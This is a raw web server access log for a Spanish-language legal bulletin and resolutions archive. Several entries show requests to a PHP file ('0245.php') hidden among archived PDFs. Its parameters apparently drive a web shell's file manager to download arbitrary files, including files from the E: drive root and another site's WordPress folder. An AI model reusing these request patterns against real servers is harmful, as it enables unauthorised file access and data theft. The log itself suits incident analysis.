172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [16/Jun/2024:21:54:24 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [16/Jun/2024:21:54:25 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [16/Jun/2024:21:52:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [16/Jun/2024:21:54:26 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
47.128.48.97 - - [16/Jun/2024:21:54:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0337.pdf&ft=download HTTP/1.1" 200 405159
66.249.66.19 - - [16/Jun/2024:21:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/2739.pdf HTTP/1.1" 200 871517
47.128.113.18 - - [16/Jun/2024:21:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3785.pdf&ft=download&white=1 HTTP/1.1" 200 364199
201.245.192.253 - - [16/Jun/2024:21:55:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:55:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 494045
172.22.2.4 - - [16/Jun/2024:21:55:30 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [16/Jun/2024:21:55:30 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
66.249.66.164 - - [16/Jun/2024:21:55:49 -0500] "GET /robots.txt HTTP/1.1" 404 1043
66.249.66.164 - - [16/Jun/2024:21:55:49 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 200 217496
47.128.45.221 - - [16/Jun/2024:21:55:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001598.tif&ft=download HTTP/1.1" 200 134288
201.245.192.253 - - [16/Jun/2024:21:56:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.52.102 - - [16/Jun/2024:21:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=eula.1042.txt&ft=download HTTP/1.1" 200 17734
172.22.2.4 - - [16/Jun/2024:21:56:39 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000003%20DEL%2016%20DE%20FEBRERO%20DEL%202024.pdf HTTP/1.1" 304 -
47.128.40.44 - - [16/Jun/2024:21:57:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=post-template.php&ft=download&white=1 HTTP/1.1" 200 57315
201.245.192.253 - - [16/Jun/2024:21:57:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:57:49 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
172.22.2.4 - - [16/Jun/2024:21:57:49 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
47.128.40.118 - - [16/Jun/2024:21:58:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1423.pdf&ft=download&white=1 HTTP/1.1" 200 937639
